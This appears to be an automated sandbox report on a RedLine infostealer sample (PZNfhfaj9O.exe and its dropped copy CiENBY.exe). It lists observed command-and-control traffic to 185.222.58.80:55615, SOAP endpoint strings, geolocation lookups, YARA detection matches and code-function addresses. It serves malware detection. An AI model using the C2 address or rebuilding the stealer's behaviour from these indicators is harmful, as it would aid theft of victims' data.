                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.80:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:5
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:55615
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:55615/
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: CiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmpDe
                    Source: CiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.co2/t/Re
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1958380307.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: CiENBY.exe, 00000012.00000002.2081500546.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002890000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_02CDD3840_2_02CDD384
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076684800_2_07668480
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_0766A2900_2_0766A290
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_0766AEA00_2_0766AEA0
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07668CE10_2_07668CE1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07668CF00_2_07668CF0
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076608400_2_07660840
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076608500_2_07660850
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076688A80_2_076688A8
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076688B80_2_076688B8
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_0B0209F80_2_0B0209F8
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_0140E7B09_2_0140E7B0
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_0140DC909_2_0140DC90
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067D96309_2_067D9630
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067D369F9_2_067D369F
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067D44689_2_067D4468
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067D12109_2_067D1210
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067DDD189_2_067DDD18
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067DDA249_2_067DDA24
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067DD5289_2_067DD528
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_02C8D38411_2_02C8D384
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717F9F011_2_0717F9F0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717848011_2_07178480
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717A4F011_2_0717A4F0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717A28111_2_0717A281
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717AEA011_2_0717AEA0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_07178CF011_2_07178CF0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_07178CE111_2_07178CE1
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717F9CE11_2_0717F9CE
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717085011_2_07170850
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_0717084011_2_07170840
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_071788B811_2_071788B8
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_071788A811_2_071788A8
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0263E7B018_2_0263E7B0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0263DC9018_2_0263DC90
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611446818_2_06114468
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611962818_2_06119628
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611121018_2_06111210
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611F3E018_2_0611F3E0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611D10818_2_0611D108
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611DD0018_2_0611DD00
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 18_2_0611F3D218_2_0611F3D2
                    Source: PZNfhfaj9O.exeStatic PE information: invalid certificate
